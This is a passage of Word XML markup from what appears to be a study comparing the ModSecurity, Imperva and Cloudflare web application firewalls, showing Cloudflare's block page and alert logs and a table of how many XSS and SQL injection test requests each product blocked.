      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Imperva alert</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
    </w:p>
    <w:p w14:paraId="20D2AECC" w14:textId="68E41331" w:rsidR="00B6768F" w:rsidRDefault="000029FC" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When a request is blocked by </w:t>
      </w:r>
      <w:r w:rsidR="00B6768F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:r w:rsidR="00B6768F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cloud WAF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>, a Cloudflare error page</w:t>
      </w:r>
      <w:r w:rsidR="00B37723">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00963D43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00B37723">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> would be displayed. On Cloudflare’s error page,</w:t>
      </w:r>
      <w:r w:rsidR="00B37723">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> a brief description of the blockage was displayed, along with a Cloudflare Ray ID, which is a reference ID for the blockage and the client IP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFE6AB4" w14:textId="7BAB9D90" w:rsidR="00B6768F" w:rsidRDefault="00B6768F" w:rsidP="00963D43">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45CBF57B" wp14:editId="6C2C3505">
            <wp:extent cx="5731510" cy="8001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79269"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="000029FC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000029FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16BA37DD" wp14:editId="1ED20F8F">
            <wp:extent cx="5731510" cy="16135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613535"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1B98C" w14:textId="6DC57943" w:rsidR="00963D43" w:rsidRDefault="00963D43" w:rsidP="00963D43">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc71138542"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Cloudflare error page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="724F95E5" w14:textId="1E5D441E" w:rsidR="000029FC" w:rsidRPr="00B6768F" w:rsidRDefault="00B37723" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Details of the blockage could be found in Cloudflare’s portal’s Firewall section. The events were recorded under the activity log. Filters could be applied to narrow down the activity logs through </w:t>
      </w:r>
      <w:r w:rsidR="004338C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> categories such as action, country, IP, </w:t>
      </w:r>
      <w:r w:rsidR="004338C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Ray ID and user agent.</w:t>
      </w:r>
      <w:r w:rsidR="003F5A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00827BB5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="003F5A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an alert of a request that was blocked. </w:t>
      </w:r>
      <w:r w:rsidR="00985CC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Similar d</w:t>
      </w:r>
      <w:r w:rsidR="003F5A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>etails found</w:t>
      </w:r>
      <w:r w:rsidR="00985CC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Imperva’s alerts could be found</w:t>
      </w:r>
      <w:r w:rsidR="003F5A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> within </w:t>
      </w:r>
      <w:r w:rsidR="00985CC4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Cloudflare’s and more. Within the alert, it also identified which rule was triggered and a short description of it.</w:t>
      </w:r>
      <w:r w:rsidR="006F08E3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cloudflare’s events were observed to be displayed within the minute from the time of the blockage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50194047" w14:textId="085EE3E1" w:rsidR="00B6768F" w:rsidRDefault="00B37723" w:rsidP="00397438">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F4E754F" wp14:editId="4283C1A8">
            <wp:extent cx="5731510" cy="43675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367530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B58E211" w14:textId="7A20564C" w:rsidR="00397438" w:rsidRDefault="00397438" w:rsidP="00397438">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc71138543"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00755101">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00341E74">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - Cloudflare alert</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="70379B26" w14:textId="2B4642E8" w:rsidR="004330A2" w:rsidRPr="00DE6606" w:rsidRDefault="00FE6389" w:rsidP="00FE6389">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc71138502"/>
      <w:r>
        <w:t xml:space="preserve">4.4 </w:t>
      </w:r>
      <w:r w:rsidR="004330A2" w:rsidRPr="00DE6606">
        <w:t>Security</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="195E1F00" w14:textId="7CB98F77" w:rsidR="00213189" w:rsidRPr="00DE6606" w:rsidRDefault="009A3CCD" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of WAFs is to protect the origin server from malicious attacks. Today, the basic expectation of a WAF is to protect against known attacks. The better performing WAFs would have their rules updated regularly to protect against latest threats. In this paper, </w:t>
      </w:r>
      <w:r w:rsidR="008737B8" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> three WAFs</w:t>
      </w:r>
      <w:r w:rsidR="008737B8" w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> were tested</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> against some of common attacks within the OWASP Top 10. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="7983" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2875"/>
        <w:gridCol w:w="1702"/>
        <w:gridCol w:w="1703"/>
        <w:gridCol w:w="1703"/>
      </w:tblGrid>
      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="3056854E" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="287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22059E3" w14:textId="49B28E58" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="009605FF" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Attack Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E25486F" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>ModSecurity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3758A48A" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Imperva</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EAD1048" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cloudflare</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000848A9" w:rsidRPr="00213189" w14:paraId="1A535E43" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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925781C" w14:textId="77777777" w:rsidR="000848A9" w:rsidRPr="00213189" w:rsidRDefault="000848A9" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D7D88E2" w14:textId="27F3AFF3" w:rsidR="000848A9" w:rsidRPr="00213189" w:rsidRDefault="000848A9" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="00E15258">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53F94794" w14:textId="77777777" w:rsidR="000848A9" w:rsidRPr="00213189" w:rsidRDefault="000848A9" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>123/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D3BCDD0" w14:textId="77777777" w:rsidR="000848A9" w:rsidRPr="00213189" w:rsidRDefault="000848A9" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>108/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00213189" w:rsidRPr="00213189" w14:paraId="089F73C4" w14:textId="77777777" w:rsidTr="00695FFA">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>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244D170" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25236FD5" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>124/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B86166C" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>110/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1703" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4217081F" w14:textId="77777777" w:rsidR="00213189" w:rsidRPr="00213189" w:rsidRDefault="00213189" w:rsidP="00F57C04">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00213189">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>106/124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
